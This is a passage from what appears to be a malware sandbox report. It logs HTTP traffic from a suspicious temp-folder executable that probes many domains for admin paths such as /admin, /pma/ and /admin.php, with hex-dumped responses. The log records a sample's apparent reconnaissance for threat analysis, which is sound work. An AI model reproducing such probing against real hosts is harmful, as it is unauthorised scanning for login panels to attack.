2023-11-30 10:22:47 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	58230	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:47 UTC	160	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:47 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:47 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	58012	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:47 UTC	160	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:47 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:47 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	58300	15.197.172.60	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:47 UTC	276	OUT	GET /admin HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	764	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:47 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:47 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	58351	3.33.224.147	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:47 UTC	156	OUT	GET / HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	409	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 62 37 30 37 62 30 63 37 34 37 61 62 32 63 33 66 62 33 39 63 66 37 35 61 61 36 39 31 62 30 30 Data Ascii: HTTP/1.1 200 OKServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=300, privateDate: Thu, 30 Nov 2023 10:22:47 GMTETag: "0b707b0c747ab2c3fb39cf75aa691b00
2023-11-30 10:22:47 UTC	15975	IN	Data Raw: 31 66 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 70 61 72 6b 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 1f18<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta property="environment" content="parking"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-widt
2023-11-30 10:22:47 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 69 6e 71 75 69 72 79 5f 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 77 2d 6d 69 6e 20 77 68 69 74 65 73 70 61 63 65 2d 6e 6f 77 72 61 70 20 74 65 78 74 2d 5b 31 35 70 78 5d 20 6c 65 61 64 69 6e 67 2d 5b 31 38 70 78 5d 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 74 65 78 74 2d 67 72 61 79 2d 37 0d 0a 32 30 30 30 0d 0a 30 30 20 21 74 65 78 74 2d 5b 31 34 70 78 5d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 26 6e 62 73 70 Data Ascii: <div class="flex flex-col"> <label for="inquiry_email" class="w-min whitespace-nowrap text-[15px] leading-[18px] font-semibold text-gray-7200000 !text-[14px]"> Email&nbsp
2023-11-30 10:22:47 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 54 22 20 3e 4c 54 20 2d 20 4c 69 74 68 75 61 6e 69 61 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 55 22 20 3e 4c 55 20 2d 20 4c 75 78 65 6d 62 6f 75 72 67 3c 2f 6f 70 0d 0a 31 30 30 30 0d 0a 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <option value="LT" >LT - Lithuania</option> <option value="LU" >LU - Luxembourg</op1000tion>
2023-11-30 10:22:47 UTC	7909	IN	Data Raw: 3a 72 69 6e 67 2d 32 20 66 6f 63 75 73 3a 72 69 6e 67 2d 70 72 69 6d 61 72 79 2d 6c 69 67 68 74 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 64 69 73 61 62 6c 65 64 3a 62 67 2d 67 72 61 79 2d 31 30 30 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 20 72 6f 75 6e 64 65 64 2d 6d 64 20 73 68 61 64 6f 77 2d 73 6d 20 68 6f 76 65 72 3a 73 68 61 64 6f 77 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 73 68 61 64 6f 77 2d 73 6d 20 21 68 2d 5b 33 36 70 78 5d 20 66 6f 63 75 73 3a 21 72 69 6e 67 2d 62 6c 75 65 2d 32 30 30 20 66 6f 63 75 73 3a 21 62 6f 72 64 65 72 2d 67 72 61 79 Data Ascii: :ring-2 focus:ring-primary-light focus:border focus:border-primary disabled:cursor-not-allowed disabled:bg-gray-100 disabled:hover:border-gray-300 rounded-md shadow-sm hover:shadow disabled:hover:shadow-sm !h-[36px] focus:!ring-blue-200 focus:!border-gray

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	58302	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:47 UTC	165	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:47 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:47 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	59041	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:47 UTC	232	OUT	GET /admin HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.80.36; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:47 UTC	718	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:47 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:47 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	59683	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:47 UTC	233	OUT	GET /admin HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.119.144.201; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:48 UTC	717	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:48 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:48 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	60249	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:48 UTC	164	OUT	GET /admin HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:48 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:48 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:48 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
